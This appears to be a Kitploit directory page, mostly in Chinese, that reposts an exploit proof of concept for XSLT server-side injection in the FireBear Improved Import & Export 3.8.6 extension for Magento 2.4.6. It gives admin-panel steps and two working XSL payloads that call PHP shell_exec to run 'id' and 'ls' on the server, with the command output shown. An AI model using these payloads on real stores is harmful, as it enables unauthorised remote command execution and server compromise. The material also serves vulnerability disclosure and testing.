Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Magento-ver.-2.4.6 — Magento ver. 2.4.6 - XSLT Server Side Injection | Kitploit
工具/GitHubGitHub/capture0x/magento-ver.-2.4.6
Vulnerability AnalysisExploitationWeb Application ExploitationPayload Development
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection

查看仓库
42年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Exploit 标题:FireBear Studio Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT 服务端注入

  • 日期: 2023-11-17
  • 漏洞作者: tmrswrr
  • 厂商主页: FireBear Studio
  • 软件链接: FireBear Studio Improved Import & Export
  • 版本: FireBear Improved Import & Export ver. 3.8.6
Magento Image Magento Image

POC

  1. 使用管理员凭据访问此 URL:https://magento2demo.firebearstudio.com/

  2. 点击 SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. 选择 Import File Type > XML > Import Source is File

  4. 上传任意 xml 文件

  5. 点击 XSLT Configuration 并写入此 payload:

    root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

root@kitploit:~
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
下载工具